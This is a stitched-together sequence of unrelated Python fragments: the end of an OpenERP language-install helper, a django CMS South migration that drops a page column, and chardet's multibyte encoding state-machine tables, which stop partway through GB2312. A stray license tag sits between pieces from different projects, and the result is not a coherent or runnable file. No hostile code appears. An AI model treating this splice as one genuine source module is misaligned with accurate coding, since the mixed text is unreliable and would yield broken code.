    """Install the translation terms for one language.

    Used mainly to automate language loading at db initialization: runs the
    ``base.language.install`` wizard as the superuser.

    :param cr: database cursor for the target database
    :param lang: language ISO code with optional _underscore_ and l10n
                 flavor (ex: 'fr', 'fr_BE', but not 'fr-BE')
    :type lang: str
    """
    installer = openerp.registry(cr.dbname)['base.language.install']
    wizard_id = installer.create(cr, SUPERUSER_ID, {'lang': lang})
    installer.lang_install(cr, SUPERUSER_ID, [wizard_id], context=None)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """Schema migration: drop the obsolete ``Page.published_languages`` column.

    Auto-generated by South.  ``models`` is a frozen snapshot of the ORM at
    the time this migration was created and must not be edited by hand.
    (Fix: removed a stray ``| bsd-3-clause |`` artifact that had been fused
    onto the ``complete_apps`` line, which made the module a syntax error.)
    """

    def forwards(self, orm):
        # Deleting field 'Page.published_languages'
        db.delete_column(u'cms_page', 'published_languages')

    def backwards(self, orm):
        # Adding field 'Page.published_languages' back (reverse of forwards)
        db.add_column(u'cms_page', 'published_languages',
                      self.gf('django.db.models.fields.CharField')(max_length=255, null=True, blank=True),
                      keep_default=False)

    # Frozen ORM definitions (South snapshot) -- do not edit manually.
    models = {
        u'auth.group': {
            'Meta': {'object_name': 'Group'},
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        u'auth.permission': {
            'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        u'auth.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        'cms.cmsplugin': {
            'Meta': {'object_name': 'CMSPlugin'},
            'changed_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'creation_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'language': ('django.db.models.fields.CharField', [], {'max_length': '15', 'db_index': 'True'}),
            'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.CMSPlugin']", 'null': 'True', 'blank': 'True'}),
            'placeholder': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Placeholder']", 'null': 'True'}),
            'plugin_type': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'}),
            'position': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
            'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
        },
        'cms.globalpagepermission': {
            'Meta': {'object_name': 'GlobalPagePermission'},
            'can_add': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'can_change': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'can_change_advanced_settings': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'can_change_permissions': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'can_delete': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'can_move_page': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'can_publish': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'can_recover_page': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'can_view': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'group': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.Group']", 'null': 'True', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'sites': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['sites.Site']", 'null': 'True', 'blank': 'True'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'})
        },
        'cms.page': {
            'Meta': {'ordering': "('tree_id', 'lft')", 'unique_together': "(('publisher_is_draft', 'application_namespace'),)", 'object_name': 'Page'},
            'application_namespace': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
            'application_urls': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '200', 'null': 'True', 'blank': 'True'}),
            'changed_by': ('django.db.models.fields.CharField', [], {'max_length': '70'}),
            'changed_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'created_by': ('django.db.models.fields.CharField', [], {'max_length': '70'}),
            'creation_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'in_navigation': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
            'is_home': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
            'languages': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
            'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            'limit_visibility_in_menu': ('django.db.models.fields.SmallIntegerField', [], {'default': 'None', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
            'login_required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'navigation_extenders': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '80', 'null': 'True', 'blank': 'True'}),
            'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['cms.Page']"}),
            'placeholders': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['cms.Placeholder']", 'symmetrical': 'False'}),
            'publication_date': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
            'publication_end_date': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
            'publisher_is_draft': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
            'publisher_public': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'publisher_draft'", 'unique': 'True', 'null': 'True', 'to': "orm['cms.Page']"}),
            'reverse_id': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '40', 'null': 'True', 'blank': 'True'}),
            'revision_id': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
            'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            'site': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'djangocms_pages'", 'to': u"orm['sites.Site']"}),
            'soft_root': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
            'template': ('django.db.models.fields.CharField', [], {'default': "'INHERIT'", 'max_length': '100'}),
            'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
        },
        'cms.pagemoderatorstate': {
            'Meta': {'ordering': "('page', 'action', '-created')", 'object_name': 'PageModeratorState'},
            'action': ('django.db.models.fields.CharField', [], {'max_length': '3', 'null': 'True', 'blank': 'True'}),
            'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'message': ('django.db.models.fields.TextField', [], {'default': "''", 'max_length': '1000', 'blank': 'True'}),
            'page': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Page']"}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True'})
        },
        'cms.pagepermission': {
            'Meta': {'object_name': 'PagePermission'},
            'can_add': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'can_change': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'can_change_advanced_settings': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'can_change_permissions': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'can_delete': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'can_move_page': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'can_publish': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'can_view': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'grant_on': ('django.db.models.fields.IntegerField', [], {'default': '5'}),
            'group': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.Group']", 'null': 'True', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'page': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Page']", 'null': 'True', 'blank': 'True'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'})
        },
        'cms.pageuser': {
            'Meta': {'object_name': 'PageUser', '_ormbases': [u'auth.User']},
            'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'created_users'", 'to': u"orm['auth.User']"}),
            u'user_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['auth.User']", 'unique': 'True', 'primary_key': 'True'})
        },
        'cms.pageusergroup': {
            'Meta': {'object_name': 'PageUserGroup', '_ormbases': [u'auth.Group']},
            'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'created_usergroups'", 'to': u"orm['auth.User']"}),
            u'group_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['auth.Group']", 'unique': 'True', 'primary_key': 'True'})
        },
        'cms.placeholder': {
            'Meta': {'object_name': 'Placeholder'},
            'default_width': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'slot': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'})
        },
        'cms.placeholderreference': {
            'Meta': {'object_name': 'PlaceholderReference', 'db_table': "u'cmsplugin_placeholderreference'", '_ormbases': ['cms.CMSPlugin']},
            u'cmsplugin_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['cms.CMSPlugin']", 'unique': 'True', 'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'placeholder_ref': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Placeholder']", 'null': 'True'})
        },
        'cms.staticplaceholder': {
            'Meta': {'object_name': 'StaticPlaceholder'},
            'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'blank': 'True'}),
            'creation_method': ('django.db.models.fields.CharField', [], {'default': "'code'", 'max_length': '20', 'blank': 'True'}),
            'dirty': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'draft': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'static_draft'", 'null': 'True', 'to': "orm['cms.Placeholder']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
            'public': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'static_public'", 'null': 'True', 'to': "orm['cms.Placeholder']"})
        },
        'cms.title': {
            'Meta': {'unique_together': "(('language', 'page'),)", 'object_name': 'Title'},
            'creation_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'has_url_overwrite': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'language': ('django.db.models.fields.CharField', [], {'max_length': '15', 'db_index': 'True'}),
            'menu_title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
            'meta_description': ('django.db.models.fields.TextField', [], {'max_length': '155', 'null': 'True', 'blank': 'True'}),
            'page': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'title_set'", 'to': "orm['cms.Page']"}),
            'page_title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
            'path': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
            'published': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'publisher_is_draft': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
            'publisher_public': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'publisher_draft'", 'unique': 'True', 'null': 'True', 'to': "orm['cms.Title']"}),
            'publisher_state': ('django.db.models.fields.SmallIntegerField', [], {'default': '0', 'db_index': 'True'}),
            'redirect': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
            'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
        },
        'cms.usersettings': {
            'Meta': {'object_name': 'UserSettings'},
            'clipboard': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Placeholder']", 'null': 'True', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'language': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'djangocms_usersettings'", 'to': u"orm['auth.User']"})
        },
        u'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        u'sites.site': {
            'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
            'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        }
    }

    complete_apps = ['cms']
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from .constants import eStart, eError, eItsMe
# BIG5
# Maps each input byte value (0x00-0xff) to a character class index.
BIG5_cls = (
    1,1,1,1,1,1,1,1, # 00 - 07 #allow 0x00 as legal value
    1,1,1,1,1,1,0,0, # 08 - 0f
    1,1,1,1,1,1,1,1, # 10 - 17
    1,1,1,0,1,1,1,1, # 18 - 1f
    1,1,1,1,1,1,1,1, # 20 - 27
    1,1,1,1,1,1,1,1, # 28 - 2f
    1,1,1,1,1,1,1,1, # 30 - 37
    1,1,1,1,1,1,1,1, # 38 - 3f
    2,2,2,2,2,2,2,2, # 40 - 47
    2,2,2,2,2,2,2,2, # 48 - 4f
    2,2,2,2,2,2,2,2, # 50 - 57
    2,2,2,2,2,2,2,2, # 58 - 5f
    2,2,2,2,2,2,2,2, # 60 - 67
    2,2,2,2,2,2,2,2, # 68 - 6f
    2,2,2,2,2,2,2,2, # 70 - 77
    2,2,2,2,2,2,2,1, # 78 - 7f
    4,4,4,4,4,4,4,4, # 80 - 87
    4,4,4,4,4,4,4,4, # 88 - 8f
    4,4,4,4,4,4,4,4, # 90 - 97
    4,4,4,4,4,4,4,4, # 98 - 9f
    4,3,3,3,3,3,3,3, # a0 - a7
    3,3,3,3,3,3,3,3, # a8 - af
    3,3,3,3,3,3,3,3, # b0 - b7
    3,3,3,3,3,3,3,3, # b8 - bf
    3,3,3,3,3,3,3,3, # c0 - c7
    3,3,3,3,3,3,3,3, # c8 - cf
    3,3,3,3,3,3,3,3, # d0 - d7
    3,3,3,3,3,3,3,3, # d8 - df
    3,3,3,3,3,3,3,3, # e0 - e7
    3,3,3,3,3,3,3,3, # e8 - ef
    3,3,3,3,3,3,3,3, # f0 - f7
    3,3,3,3,3,3,3,0 # f8 - ff
)
# State-transition table: next state for each (state, byte class) pair.
BIG5_st = (
    eError,eStart,eStart, 3,eError,eError,eError,eError,#00-07
    eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,#08-0f
    eError,eStart,eStart,eStart,eStart,eStart,eStart,eStart#10-17
)
# Byte length of a complete character beginning with each class (0 = n/a).
Big5CharLenTable = (0, 1, 1, 2, 0)
# Packaged model: class map, class count, state table, char lengths, name.
Big5SMModel = {'classTable': BIG5_cls,
               'classFactor': 5,
               'stateTable': BIG5_st,
               'charLenTable': Big5CharLenTable,
               'name': 'Big5'}
# CP949
# Maps each input byte value (0x00-0xff) to a character class index
# (16 entries per row here, unlike the 8-per-row tables below).
CP949_cls = (
    1,1,1,1,1,1,1,1, 1,1,1,1,1,1,0,0, # 00 - 0f
    1,1,1,1,1,1,1,1, 1,1,1,0,1,1,1,1, # 10 - 1f
    1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1, # 20 - 2f
    1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1, # 30 - 3f
    1,4,4,4,4,4,4,4, 4,4,4,4,4,4,4,4, # 40 - 4f
    4,4,5,5,5,5,5,5, 5,5,5,1,1,1,1,1, # 50 - 5f
    1,5,5,5,5,5,5,5, 5,5,5,5,5,5,5,5, # 60 - 6f
    5,5,5,5,5,5,5,5, 5,5,5,1,1,1,1,1, # 70 - 7f
    0,6,6,6,6,6,6,6, 6,6,6,6,6,6,6,6, # 80 - 8f
    6,6,6,6,6,6,6,6, 6,6,6,6,6,6,6,6, # 90 - 9f
    6,7,7,7,7,7,7,7, 7,7,7,7,7,8,8,8, # a0 - af
    7,7,7,7,7,7,7,7, 7,7,7,7,7,7,7,7, # b0 - bf
    7,7,7,7,7,7,9,2, 2,3,2,2,2,2,2,2, # c0 - cf
    2,2,2,2,2,2,2,2, 2,2,2,2,2,2,2,2, # d0 - df
    2,2,2,2,2,2,2,2, 2,2,2,2,2,2,2,2, # e0 - ef
    2,2,2,2,2,2,2,2, 2,2,2,2,2,2,2,0, # f0 - ff
)
# State-transition table: next state for each (state, byte class) pair.
CP949_st = (
#cls= 0 1 2 3 4 5 6 7 8 9 # previous state =
    eError,eStart, 3,eError,eStart,eStart, 4, 5,eError, 6, # eStart
    eError,eError,eError,eError,eError,eError,eError,eError,eError,eError, # eError
    eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe, # eItsMe
    eError,eError,eStart,eStart,eError,eError,eError,eStart,eStart,eStart, # 3
    eError,eError,eStart,eStart,eStart,eStart,eStart,eStart,eStart,eStart, # 4
    eError,eStart,eStart,eStart,eStart,eStart,eStart,eStart,eStart,eStart, # 5
    eError,eStart,eStart,eStart,eStart,eError,eError,eStart,eStart,eStart, # 6
)
# Byte length of a complete character beginning with each class (0 = n/a).
CP949CharLenTable = (0, 1, 2, 0, 1, 1, 2, 2, 0, 2)
# Packaged model: class map, class count, state table, char lengths, name.
CP949SMModel = {'classTable': CP949_cls,
                'classFactor': 10,
                'stateTable': CP949_st,
                'charLenTable': CP949CharLenTable,
                'name': 'CP949'}
# EUC-JP
# Maps each input byte value (0x00-0xff) to a character class index.
EUCJP_cls = (
    4,4,4,4,4,4,4,4, # 00 - 07
    4,4,4,4,4,4,5,5, # 08 - 0f
    4,4,4,4,4,4,4,4, # 10 - 17
    4,4,4,5,4,4,4,4, # 18 - 1f
    4,4,4,4,4,4,4,4, # 20 - 27
    4,4,4,4,4,4,4,4, # 28 - 2f
    4,4,4,4,4,4,4,4, # 30 - 37
    4,4,4,4,4,4,4,4, # 38 - 3f
    4,4,4,4,4,4,4,4, # 40 - 47
    4,4,4,4,4,4,4,4, # 48 - 4f
    4,4,4,4,4,4,4,4, # 50 - 57
    4,4,4,4,4,4,4,4, # 58 - 5f
    4,4,4,4,4,4,4,4, # 60 - 67
    4,4,4,4,4,4,4,4, # 68 - 6f
    4,4,4,4,4,4,4,4, # 70 - 77
    4,4,4,4,4,4,4,4, # 78 - 7f
    5,5,5,5,5,5,5,5, # 80 - 87
    5,5,5,5,5,5,1,3, # 88 - 8f
    5,5,5,5,5,5,5,5, # 90 - 97
    5,5,5,5,5,5,5,5, # 98 - 9f
    5,2,2,2,2,2,2,2, # a0 - a7
    2,2,2,2,2,2,2,2, # a8 - af
    2,2,2,2,2,2,2,2, # b0 - b7
    2,2,2,2,2,2,2,2, # b8 - bf
    2,2,2,2,2,2,2,2, # c0 - c7
    2,2,2,2,2,2,2,2, # c8 - cf
    2,2,2,2,2,2,2,2, # d0 - d7
    2,2,2,2,2,2,2,2, # d8 - df
    0,0,0,0,0,0,0,0, # e0 - e7
    0,0,0,0,0,0,0,0, # e8 - ef
    0,0,0,0,0,0,0,0, # f0 - f7
    0,0,0,0,0,0,0,5 # f8 - ff
)
# State-transition table: next state for each (state, byte class) pair.
EUCJP_st = (
    3, 4, 3, 5,eStart,eError,eError,eError,#00-07
    eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f
    eItsMe,eItsMe,eStart,eError,eStart,eError,eError,eError,#10-17
    eError,eError,eStart,eError,eError,eError, 3,eError,#18-1f
    3,eError,eError,eError,eStart,eStart,eStart,eStart#20-27
)
# Byte length of a complete character beginning with each class (0 = n/a).
EUCJPCharLenTable = (2, 2, 2, 3, 1, 0)
# Packaged model: class map, class count, state table, char lengths, name.
EUCJPSMModel = {'classTable': EUCJP_cls,
                'classFactor': 6,
                'stateTable': EUCJP_st,
                'charLenTable': EUCJPCharLenTable,
                'name': 'EUC-JP'}
# EUC-KR
# Maps each input byte value (0x00-0xff) to a character class index.
EUCKR_cls = (
    1,1,1,1,1,1,1,1, # 00 - 07
    1,1,1,1,1,1,0,0, # 08 - 0f
    1,1,1,1,1,1,1,1, # 10 - 17
    1,1,1,0,1,1,1,1, # 18 - 1f
    1,1,1,1,1,1,1,1, # 20 - 27
    1,1,1,1,1,1,1,1, # 28 - 2f
    1,1,1,1,1,1,1,1, # 30 - 37
    1,1,1,1,1,1,1,1, # 38 - 3f
    1,1,1,1,1,1,1,1, # 40 - 47
    1,1,1,1,1,1,1,1, # 48 - 4f
    1,1,1,1,1,1,1,1, # 50 - 57
    1,1,1,1,1,1,1,1, # 58 - 5f
    1,1,1,1,1,1,1,1, # 60 - 67
    1,1,1,1,1,1,1,1, # 68 - 6f
    1,1,1,1,1,1,1,1, # 70 - 77
    1,1,1,1,1,1,1,1, # 78 - 7f
    0,0,0,0,0,0,0,0, # 80 - 87
    0,0,0,0,0,0,0,0, # 88 - 8f
    0,0,0,0,0,0,0,0, # 90 - 97
    0,0,0,0,0,0,0,0, # 98 - 9f
    0,2,2,2,2,2,2,2, # a0 - a7
    2,2,2,2,2,3,3,3, # a8 - af
    2,2,2,2,2,2,2,2, # b0 - b7
    2,2,2,2,2,2,2,2, # b8 - bf
    2,2,2,2,2,2,2,2, # c0 - c7
    2,3,2,2,2,2,2,2, # c8 - cf
    2,2,2,2,2,2,2,2, # d0 - d7
    2,2,2,2,2,2,2,2, # d8 - df
    2,2,2,2,2,2,2,2, # e0 - e7
    2,2,2,2,2,2,2,2, # e8 - ef
    2,2,2,2,2,2,2,2, # f0 - f7
    2,2,2,2,2,2,2,0 # f8 - ff
)
# State-transition table: next state for each (state, byte class) pair.
EUCKR_st = (
    eError,eStart, 3,eError,eError,eError,eError,eError,#00-07
    eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,eStart,eStart #08-0f
)
# Byte length of a complete character beginning with each class (0 = n/a).
EUCKRCharLenTable = (0, 1, 2, 0)
# Packaged model: class map, class count, state table, char lengths, name.
EUCKRSMModel = {'classTable': EUCKR_cls,
                'classFactor': 4,
                'stateTable': EUCKR_st,
                'charLenTable': EUCKRCharLenTable,
                'name': 'EUC-KR'}
# EUC-TW
# Maps each input byte value (0x00-0xff) to a character class index.
EUCTW_cls = (
    2,2,2,2,2,2,2,2, # 00 - 07
    2,2,2,2,2,2,0,0, # 08 - 0f
    2,2,2,2,2,2,2,2, # 10 - 17
    2,2,2,0,2,2,2,2, # 18 - 1f
    2,2,2,2,2,2,2,2, # 20 - 27
    2,2,2,2,2,2,2,2, # 28 - 2f
    2,2,2,2,2,2,2,2, # 30 - 37
    2,2,2,2,2,2,2,2, # 38 - 3f
    2,2,2,2,2,2,2,2, # 40 - 47
    2,2,2,2,2,2,2,2, # 48 - 4f
    2,2,2,2,2,2,2,2, # 50 - 57
    2,2,2,2,2,2,2,2, # 58 - 5f
    2,2,2,2,2,2,2,2, # 60 - 67
    2,2,2,2,2,2,2,2, # 68 - 6f
    2,2,2,2,2,2,2,2, # 70 - 77
    2,2,2,2,2,2,2,2, # 78 - 7f
    0,0,0,0,0,0,0,0, # 80 - 87
    0,0,0,0,0,0,6,0, # 88 - 8f
    0,0,0,0,0,0,0,0, # 90 - 97
    0,0,0,0,0,0,0,0, # 98 - 9f
    0,3,4,4,4,4,4,4, # a0 - a7
    5,5,1,1,1,1,1,1, # a8 - af
    1,1,1,1,1,1,1,1, # b0 - b7
    1,1,1,1,1,1,1,1, # b8 - bf
    1,1,3,1,3,3,3,3, # c0 - c7
    3,3,3,3,3,3,3,3, # c8 - cf
    3,3,3,3,3,3,3,3, # d0 - d7
    3,3,3,3,3,3,3,3, # d8 - df
    3,3,3,3,3,3,3,3, # e0 - e7
    3,3,3,3,3,3,3,3, # e8 - ef
    3,3,3,3,3,3,3,3, # f0 - f7
    3,3,3,3,3,3,3,0 # f8 - ff
)
# State-transition table: next state for each (state, byte class) pair.
EUCTW_st = (
    eError,eError,eStart, 3, 3, 3, 4,eError,#00-07
    eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,#08-0f
    eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eStart,eError,#10-17
    eStart,eStart,eStart,eError,eError,eError,eError,eError,#18-1f
    5,eError,eError,eError,eStart,eError,eStart,eStart,#20-27
    eStart,eError,eStart,eStart,eStart,eStart,eStart,eStart #28-2f
)
# Byte length of a complete character beginning with each class (0 = n/a).
EUCTWCharLenTable = (0, 0, 1, 2, 2, 2, 3)
# Packaged model: class map, class count, state table, char lengths, name.
EUCTWSMModel = {'classTable': EUCTW_cls,
                'classFactor': 7,
                'stateTable': EUCTW_st,
                'charLenTable': EUCTWCharLenTable,
                'name': 'x-euc-tw'}
# GB2312
# Maps each input byte value (0x00-0xff) to a character class index.
GB2312_cls = (
    1,1,1,1,1,1,1,1, # 00 - 07
    1,1,1,1,1,1,0,0, # 08 - 0f
    1,1,1,1,1,1,1,1, # 10 - 17
    1,1,1,0,1,1,1,1, # 18 - 1f
    1,1,1,1,1,1,1,1, # 20 - 27
    1,1,1,1,1,1,1,1, # 28 - 2f
    3,3,3,3,3,3,3,3, # 30 - 37
    3,3,1,1,1,1,1,1, # 38 - 3f
    2,2,2,2,2,2,2,2, # 40 - 47
    2,2,2,2,2,2,2,2, # 48 - 4f
    2,2,2,2,2,2,2,2, # 50 - 57
    2,2,2,2,2,2,2,2, # 58 - 5f
    2,2,2,2,2,2,2,2, # 60 - 67
